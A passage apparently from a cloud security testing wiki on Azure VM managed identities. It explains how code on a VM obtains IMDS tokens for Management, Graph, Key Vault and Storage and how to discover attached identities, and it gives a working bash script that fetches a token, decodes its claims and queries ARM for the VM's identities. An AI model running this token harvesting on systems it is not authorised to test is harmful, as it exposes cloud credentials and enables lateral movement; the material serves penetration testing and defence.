  • A VM's managed identity assignment is not guaranteed to be represented as UserAssignedIdentity nodes inside the extension XML.
  • They miss system-assigned managed identities.
  • They only find user-assigned identities if the current GoalState/extension data happens to expose the expected XML shape.

The security model documented by Microsoft is that any code running on the VM can request tokens for the managed identities available to that VM. This was confirmed from:

  • Linux SSH as a regular VM user.
  • Linux Run Command through the VM Agent.
  • Linux Custom Script extension through the VM Agent.
  • Windows Custom Script extension as NT AUTHORITY\SYSTEM.

In all of those contexts IMDS could issue tokens for Management, Microsoft Graph/Entra ID, Key Vault and Storage whenever the requested identity was available to the VM.

There are two different problems that are easy to confuse:

  • Getting a token for a known identity: If the identity is assigned to the VM, IMDS can issue tokens for different audiences such as https://management.azure.com/, https://graph.microsoft.com/, https://vault.azure.net and https://storage.azure.com/. If there are several user-assigned identities, request a specific one with client_id, object_id or msi_res_id.
  • Discovering every identity attached to the VM from inside the VM: IMDS does not expose a simple "list all identities" endpoint. The practical approach is to get the default Management token, read the VM resource through ARM and inspect its identity property. This only works if that managed identity has permissions such as Microsoft.Compute/virtualMachines/read on the VM. If ARM returns 403, the token may still be valid and useful, but it cannot enumerate the full list of VM identities.

If ARM discovery fails, you can still try WireServer/HostGAPlugin sources such as GoalState and http://168.63.129.16:32526/vmSettings, looking for identity-like fields (clientId, IdentityClientId, msi_res_id, user-assigned identity resource IDs) and then requesting IMDS tokens with those selectors. This is a fallback, not a guarantee: those endpoints depend on context and may not expose managed identity selectors at all.

The following example first requests a token. Then it tries to read the VM resource from Azure Resource Manager and prints its identity property. The second step only works if the managed identity has permissions such as Microsoft.Compute/virtualMachines/read on the VM.

#!/usr/bin/env bash
set -euo pipefail

imds="http://169.254.169.254/metadata"
api_version="2021-02-01"
resource="${1:-https://management.azure.com/}"

# Optional. Examples:
#   export MSI_SELECTOR='client_id=<client-id>'
#   export MSI_SELECTOR='object_id=<principal-id>'
#   export MSI_SELECTOR='msi_res_id=/subscriptions/.../userAssignedIdentities/name'
selector="${MSI_SELECTOR:-}"

urlencode() {
  python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=""))' "$1"
}

token_url="$imds/identity/oauth2/token?api-version=$api_version&resource=$(urlencode "$resource")"
if [[ -n "$selector" ]]; then
  token_url="$token_url&$selector"
fi

echo "[*] Requesting managed identity token for: $resource"
# Metadata:true is mandatory and the request must not go through a proxy
token_json="$(curl -fsS --noproxy "*" -H "Metadata:true" "$token_url")"

access_token="$(
  TOKEN_JSON="$token_json" python3 - <<'PY'
import json, os
print(json.loads(os.environ["TOKEN_JSON"])["access_token"])
PY
)"

# Decode the JWT payload locally (no signature check needed, we only want the claims)
TOKEN="$access_token" python3 - <<'PY'
import base64, json, os

token = os.environ["TOKEN"]
payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)
claims = json.loads(base64.urlsafe_b64decode(payload))

print("[+] Token acquired")
for key in ("tid", "appid", "oid", "xms_mirid"):
    if key in claims:
        print(f"    {key}: {claims[key]}")
PY

echo "[*] Trying to read the VM identity property through ARM..."
compute_json="$(curl -fsS --noproxy "*" -H "Metadata:true" "$imds/instance/compute?api-version=$api_version")"
vm_id="$(
  COMPUTE_JSON="$compute_json" python3 - <<'PY'
import json, os
print(json.loads(os.environ["COMPUTE_JSON"])["resourceId"])
PY
)"

arm_url="https://management.azure.com${vm_id}?api-version=2024-07-01"
if vm_json="$(curl -fsS -H "Authorization: Bearer $access_token" "$arm_url" 2>/dev/null)"; then
  VM_JSON="$vm_json" python3 - <<'PY'
import json, os
vm = json.loads(os.environ["VM_JSON"])
print(json.dumps(vm.get("identity", {}), indent=2))
PY
else
  echo "[-] Could not read the VM resource with this identity. The token may still be valid, but it lacks ARM read permissions on the VM."
fi

Privilege Escalation

Az - Virtual Machines & Network Privesc

Unauthenticated Access

Az - VMs Unauth

Post Exploitation

Az - VMs & Network Post Exploitation

Persistence

Az - VMs Persistence
